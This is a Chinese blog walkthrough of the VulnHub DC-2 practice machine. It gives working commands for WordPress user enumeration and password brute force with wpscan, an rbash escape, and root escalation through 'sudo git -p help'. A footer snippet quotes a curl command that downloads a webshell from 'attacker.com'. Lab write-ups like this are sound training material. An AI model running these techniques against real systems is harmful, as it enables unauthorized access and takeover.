vulhub靶场 DC-2 解析及完整复现

最新推荐文章于 2024-03-20 23:38:08 发布
最新推荐文章于 2024-03-20 23:38:08 发布
阅读量881 收藏 22
点赞数 18
文章标签: 渗透测试 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32277727/article/details/136217625
版权

环境准备:

kali: NAT模式 网段 :192.168.200.0

DC-2: NAT模式 网段 :192.168.200.0

保证靶机和攻击机在一个网段上

信息收集

收集同网段存货主机IP地址

nmap -sP  ip地址

在这里插入图片描述

arp-scan -l

在这里插入图片描述

显示错误页面,显然是重定向错误,在本地HOST文件中添加这样的关系

在这里插入图片描述

本地中

在这里插入图片描述

kali中host地址

vim /etc/hosts

以上都可以

1703570644_658a6cd4a938eac1d44ff.png!small?1703570645885

之后就重定向正常页面啦

第一flag提示
在这里插入图片描述

cewl介绍

cewl是一个ruby应用,爬行指定url的指定深度。
也可以跟一个外部链接,结果会返回一个单词列表,
这个列表可以扔到John the ripper工具里进行密码破解。
-w   将输出结果写入到文件中
-d  爬行深度,默认为2
-m 最小长度,默认为3
cewl http://dc-2 -w passwd.txt #扒取网站字典,将结果输入到passwd.txt中

1703570628_658a6cc4a1f04ebf1e0e7.png!small?1703570628880

用 cewl http://192.168.28.179 -w passwd.txt ,但是没有输出,应该是IP地址给重定向了,用域名进行扒取

cat passwd.txt #查看字典内容

1703570619_658a6cbb8bc96ad9ffafd.png!small?1703570619844

有密码字典 还需要找账号和登陆后台。

用dirb命令来挖目录

扩展:获取网站目录目录的工具有:dirb(kali自带)、御剑、dirsearch。

dirb http://dc-2

1703570606_658a6cae0338ff85aa04d.png!small?1703570606129

1703570610_658a6cb295a3d9477652d.png!small?1703570611078

登陆页面,通过插件可以知道,这是WordPress的CMS ,漏扫工具是wpscan

1703570598_658a6ca6a68ae72f8b15d.png!small?1703570599787

目前已经获取了网站的后台网址和密码,现在还差用户名,那么

wpscan --url http://dc-2/ -e u #枚举用户名

参数:wpcan 参数

-u 枚举用户名

-P 加指定文件 ,代表密码文件

-U 加指定文件,代表账户文件

最终可以查到三个用户名

1703570589_658a6c9d02475892facf7.png!small?1703570590521

将枚举出的用户名保存到文件中

1703570577_658a6c91e58a670297334.png!small?1703570578246

wpscan --url http://dc-2/ -U user.txt -P passwd.txt #爆破WordPress的账号和密码

1703570568_658a6c88f3143db307b28.png!small?1703570569484

结果,爆破出jerry和tom的密码

1703570560_658a6c80cc463941e0ab8.png!small?1703570561256

利用其一的账户和密码进行登录

1703570555_658a6c7b28dc94a3fcf29.png!small?1703570555290

登陆成功,这便是后台页面

1703570390_658a6bd6a2c44e178273b.png!small?1703570391286

flag1

1703570546_658a6c721d0eaa0516079.png!small?1703570546366

flag2

1703570539_658a6c6b988f4f3b5f2de.png!small?1703570539833

If you can't exploit WordPress and take a shortcut, there is another way.
# 如果你不能用 WordPress 走捷径的话,这里还有另一条路

Hope you found another entry point.
# 希望你能找到另一个切入点

前面的端口号还有一个7744的端口使用

使用jerry测试三组全部失败

1703570528_658a6c6058911357f75d7.png!small?1703570528717

接着尝试,Tom账户是可以登录的

1703570511_658a6c4feedab7bd04073.png!small?1703570512452

1703570519_658a6c571faed0a752b6a.png!small?1703570519331

compgen -c       //查看可以使用的指令

发现有一个VI 指令是可以使用的

1703570498_658a6c429793dbfaa2261.png!small?1703570498713

文件显示内容,发现FLAG3.txt,并成功使用和打开

1703570490_658a6c3ad335fefa5376b.png!small?1703570491411

flag3.txt

poor old Tom is always running after Jerry.
# 可怜的老汤姆总是在追杰瑞
Perhaps he should su for all the stress he causes.
# 也许他应该为自己造成的压力负责

英文当中,有两个账户tom,jerry, su这应该算是提示提权

vi 提权

vi flag3.txt
:set shell=/bin/sh  #shell需要时系统中原本就有的变量,不能自己捏造变量。
:shell

1703570481_658a6c319ad57ed96462d.png!small?1703570481810

发现在jerry下的flag.txt 用vi查看

1703570473_658a6c29695b28b7dc14e.png!small?1703570473702

flag4.txt

1703570465_658a6c217ad1b74a469b6.png!small?1703570465819

Good to see that you've made it this far - but you're not home yet.
# 很高兴看到你走了这么远-但你还没回家。
You still need to get the final flag (the only flag that really counts!!!)
# 你仍然需要得到最终的标志(唯一真正重要的标志!!!) 
No hints here - you're on your own now. 
# 这里没有提示-你现在只能靠自己了。
Go on - git outta here!!!! 
# 去吧,离这里远点 #用 git 提权

英文提示:用git提权,最终还需要拿到root权限

前面FLAG3有提示su,切到root目录查看

1703570457_658a6c1973bfcc33ab3a9.png!small?1703570457552

进入root目录

1703570452_658a6c143e6c637ca94b6.png!small?1703570452362

不让切换,做了限制 su jerry 是不可以的

**什么是rbash?**它与一般shell的区别在于会限制一些行为,让一些命令无法执行

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量
提权成功

仍然权限不够

1703570441_658a6c096d9765a93cd7e.png!small?1703570442815

用sudo -l 查看可以运用的权限

git 是root的权限,可以提权

1703570432_658a6c00673d9798b8ad1.png!small?1703570432601

sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell


git提权的两种方式
1、sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
2、sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

final-flag.txt

1703570416_658a6bf01e64508cf3c01.png!small?1703570416498

1703570422_658a6bf687d2a45fbb8f5.png!small?1703570423164

总结:

1.重定向 #在文件中加入域名和IP地址的关系映射

进入网页时出现错误情况,不会自动跳转到DC-2去,在本地DNS下绑定

2.cewl使用 #爬取URL地址和深度

flag的提示,使用cewl的命令,打印出密码破解的字典

3.wpscan使用 #扫描wordpress这个CMS的工具

暴力破解账户之前需要提供密码文件和账户文件

**4.rbash提权
**5.git提权

黑战士安全
关注
  • 18
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念验证”部分是由于 Twitter 上提出的有关双因素身份验证和 Linux 的问题以及 @theart42 的建议而产生的。 这一挑战的最终目标是绕过双因素身份验证、获得 root 权限并读取唯一的标志。 除非您尝试通过 SSH 登录,否则您可能甚至不知道已经安装和配置了双因素身份验证,但它确实存在并且正在发挥作用。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose 使用git clone https://github.com/vulhub/vulhub.git下载vulhub-master下载太慢了 我这边包需要下载的都提供了,助力你搭建vulhub靶场
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1233
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
DC-2靶机详解
苏生要努力
03-03 1196
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-2靶场
m0_74413354的博客
03-14 553
VulhubDC系列靶场DC2靶场通关
DC-2靶场实战详解
热门推荐
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
DC-2靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-02 6098
DC-2靶场渗透实战过程
DC系列】DC-2靶场
qq_51611948的博客
02-14 1054
详细介绍DC2靶机渗透全过程
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 829
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
vulhub靶场文件(不用积分)
05-18
使用Vulhub一键搭建漏洞测试靶场,下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d
vulhub靶场.zip
10-14
vulhub靶场
DC系列漏洞靶场-渗透测试学习复现DC-2)
W983079520的博客
11-03 1694
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC-2靶场步骤
2302_79546589的博客
12-05 944
知识点如下,首先就是cewl和wpscan工具的使用,其次是nmap加强扫描得到端口;重定向;cewl工具的使用,得出密码字典;wpscan枚举账户,账号密码的破解;nikto或御剑扫描网站的站点登录;compgen -c 查看服务器可使用的命令;然后就是rbash的逃逸以及git的提权。总体来讲,我还是通过DC-2靶机学到了一些之前不了解的知识点,例如:rbash等等。
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1774
dc-2实验
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 1426
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC-2靶机攻略
weixin_43179779的博客
10-16 1758
DC-2靶机攻略
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值